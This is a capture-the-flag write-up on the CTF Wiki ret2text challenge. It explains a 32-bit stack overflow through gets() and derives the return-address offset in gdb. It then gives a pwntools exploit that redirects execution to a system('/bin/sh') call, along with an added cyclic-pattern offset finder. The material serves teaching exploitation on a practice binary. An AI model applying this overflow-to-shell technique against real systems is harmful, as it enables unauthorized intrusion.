[WP] CTF Wiki: ret2text

1. First, run the program to see how it behaves.

2. Check the binary's basics: it is a 32-bit program with Partial RELRO and NX enabled. NX makes no difference here, because we return into code that is already in the binary (the system("/bin/sh") call) rather than injecting shellcode onto the stack.

3. Looking at the main function, it is not hard to see that the input read by gets() can overwrite the return address, since gets() imposes no length limit on what it writes into the stack buffer.

4. IDA shows a call to system("/bin/sh") in the binary, so the exploit is essentially already in place: all we need is to measure how many bytes to write before we reach the return address.

5. Load the program in gdb, set a breakpoint at the call to gets, run it, and inspect the registers (the absolute addresses vary between systems, but the distances within the frame do not for the same binary):

EBP: 0xffffd168 --> 0x0 
ESP: 0xffffd0e0 --> 0xffffd0fc --> 0xf7ffd000 --> 0x26f34 

6. ESP points at the first argument to gets(), which is the buffer address 0xffffd0fc. The buffer therefore starts 0x168 - 0xfc = 0x6c bytes below the saved EBP; the saved EBP itself takes another 4 bytes, so the return address sits at offset 0x70 into the buffer. Now we can write the exploit:

#!/usr/bin/env python
from pwn import *

# Register values observed in gdb at the call to gets():
#   EBP = 0xffffd168
#   ESP = 0xffffd0e0 -> 0xffffd0fc -> 0xf7ffd000 -> 0x26f34
# The first stack argument to gets() is the buffer, at 0xffffd0fc.
#   padding_num1 = 0xffffd168 - 0xffffd0fc = 0x6c  (buffer start -> saved EBP)
#   padding_num2 = 4                               (saved EBP itself, 32-bit)
# so the return address is 0x70 bytes into the buffer.
p = process('./ret2text')
bin_sh_addr = 0x804863A            # address of the system("/bin/sh") call found in IDA
payload = b'a' * (0x6c + 0x4) + p32(bin_sh_addr)   # bytes, so it also works on Python 3
p.recvuntil(b'thing?')
p.sendline(payload)
p.interactive()
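The two ways of measuring the distance to the return address in steps 4 through 6, worked through as an added example (this is not code from the original writeup or from CTF Wiki, and it needs no pwntools): ret_offset() does the arithmetic the writeup does from the gdb register values, and cyclic()/cyclic_find() show the more general route of crashing the program with a De Bruijn pattern and looking up the bytes that land in EIP, which works even when you cannot read the buffer address off the stack. The alphabet and pattern order match pwntools' cyclic(); the "crashed EIP" in the demo is constructed from the pattern itself rather than read from a real crash.

```python
import itertools
import struct

ALPHABET = b"abcdefghijklmnopqrstuvwxyz"   # same alphabet pwntools' cyclic() uses


def p32(value):
    """Pack an integer as a little-endian 32-bit word, like pwntools' p32()."""
    return struct.pack("<I", value)


def de_bruijn(alphabet=ALPHABET, n=4):
    """Lazily yield the De Bruijn sequence B(k, n): every n-byte window is unique,
    so the bytes that land in EIP after a crash identify their offset in the input."""
    k = len(alphabet)
    a = [0] * k * n

    def db(t, p):
        if t > n:
            if n % p == 0:
                for j in range(1, p + 1):
                    yield alphabet[a[j]]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    return db(1, 1)


def cyclic(length, n=4):
    """First `length` bytes of the pattern; feed this to gets() instead of 'a' * N."""
    return bytes(itertools.islice(de_bruijn(ALPHABET, n), length))


def cyclic_find(eip, n=4):
    """Offset in the pattern of the n bytes that ended up in EIP (int or bytes).
    Returns -1 if the value did not come from the pattern."""
    needle = p32(eip) if isinstance(eip, int) else bytes(eip)
    window = bytearray()
    for i, b in enumerate(de_bruijn(ALPHABET, n)):
        window.append(b)
        if len(window) > n:
            del window[0]
        if len(window) == n and bytes(window) == needle:
            return i - n + 1
    return -1


def ret_offset(ebp, buf):
    """Distance from the start of the buffer to the return address, computed from
    the saved EBP and the buffer address read in gdb (the writeup's method)."""
    return (ebp - buf) + 4          # saved EBP occupies 4 bytes on 32-bit


def build_payload(offset, target):
    """Padding up to the return address, then the address to return into."""
    return b"a" * offset + p32(target)


if __name__ == "__main__":
    # Values from the writeup's gdb session at the call to gets()
    ebp, buf, bin_sh_addr = 0xffffd168, 0xffffd0fc, 0x804863A
    off = ret_offset(ebp, buf)
    print("offset from gdb registers: %#x" % off)

    # Pattern route: send cyclic(200), read EIP in gdb after the crash, look it up.
    # Constructed here by slicing the pattern at the known offset instead of crashing.
    crashed_eip = struct.unpack("<I", cyclic(200)[off:off + 4])[0]
    print("offset from cyclic pattern: %#x" % cyclic_find(crashed_eip))
    print(build_payload(off, bin_sh_addr).hex())
```

Both routes agree on 0x70 for this binary. The pattern route is worth having for the cases where the stack frame is less obvious than here, for example when the buffer is not the first argument visible at ESP or the compiler inserts alignment padding between the buffer and the saved EBP.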


Source: www.cnblogs.com/Tsuiyields/p/11874933.html